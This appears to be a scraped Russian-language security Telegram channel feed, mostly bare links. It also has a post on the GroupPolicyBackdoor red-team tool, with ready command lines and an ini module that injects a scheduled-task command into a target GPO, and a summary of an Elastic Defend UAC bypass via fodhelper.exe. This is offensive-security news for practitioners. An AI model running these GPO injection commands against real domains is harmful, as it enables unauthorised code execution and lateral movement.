Fsecurity | HH

💻 GroupPolicyBackdoor Инструмент пост эксплуатации для различных манипуляций с GPO. Написан на 😰 Python Впервые представлена на DEFCON 33 Примеры:

#backup
python3 gpb.py restore backup -d 'corp.com' -o './my_backups' --dc ad01-dc.corp.com -u 'john' -p 'Password1!' -n 'TARGET_GPO'

#inject
python3 gpb.py gpo inject --domain 'corp.com' --dc 'ad01-dc.corp.com' -k --module modules_templates/ImmediateTask_create.ini --gpo-name 'TARGET_GPO'

Пример ini:

[MODULECONFIG]
name = Scheduled Tasks
type = computer

[MODULEOPTIONS]
task_type = immediate
program = cmd.exe
arguments = /c "whoami > C:\Temp\poc.txt"

[MODULEFILTERS]
filters =
    [{
        "operator": "AND",
        "type": "Computer Name",
        "value": "ad01-srv1.corp.com"
    }]

GPO creation, deletion, backup and injections Various injectable configurations, with, for each, customizable options (see list in the wiki) Possibility to remove injected configurations from the target GPO Possibility to revert the actions performed on client devices GPO links manipulation GPO enumeration / user privileges enumeration on GPOs

💻 Repo 📔 Docs #gpo #redteam #windows ✈️ Whitehat Lab 💬Chat

🔗Ссылка: https://www.ptsecurity.com/ru-ru/research/analytics/trendy-v-razvitii-vredonosnogo-po-i-ego-rol-v-kiberatakah/

🔗Ссылка: https://telegra.ph/OSCP-08-24

🔗Ссылка: https://habr.com/ru/articles/924814/

🔗Ссылка: https://securitymedia.org/news/microsoft-preduprezhdaet-ob-opasnoy-uyazvimosti-exchange.html

💻 Elastic Defend Bypass: UAC Bypass Chain Leading To Silent Elevation

A chained technique has been identified that allows a local, unprivileged attacker to achieve silent privilege escalation to administrator by bypassing protections enforced by Elastic Defend v9.0.4. The method leverages a trusted auto-elevated Windows binary (fodhelper.exe) in conjunction with a registry hijack and COM object execution, resulting in arbitrary code execution at elevated privileges - without triggering a UAC prompt or EDR detection

🔗 UAC Bypass 💻 Presentation #uac #bypass #windows #lpe ✈️ Whitehat Lab 💬Chat

🔗Ссылка: https://www.cyberproof.com/blog/cve-2025-49144-notepad-privilege-escalation-vulnerability-detection-analysis-and-practical-defenses/

Скоро обещанный мой трек для Хаскаря будет)))

🔗Ссылка: https://github.com/urbanadventurer/username-anarchy

🔗Ссылка: https://www.securitylab.ru/news/562651.php

🔗Ссылка: https://hackerlab.pro/blog/top-10-ai-instrumentov-dlya-nastupatelnoy-kiberbezopasnosti-2025

🔗Ссылка: https://sec.ussc.ru/fstec_117

🔗Ссылка: https://cybersecuritynews.com/0-day-clickjacking-vulnerabilities/

🔗Ссылка: https://xakep.ru/2025/08/19/booking-homoglyph/

🔗Ссылка: https://securelist.com/godrat/117119/

💻 explainshell Интерактивная памятка по 🐧Linux утилитам 🔗 Web 💻 Repo #linux #shell ✈️ Whitehat Lab 💬Chat

🔗Ссылка: https://www.securitylab.ru/news/562624.php

🔗Ссылка: https://github.com/chenjj/CORScanner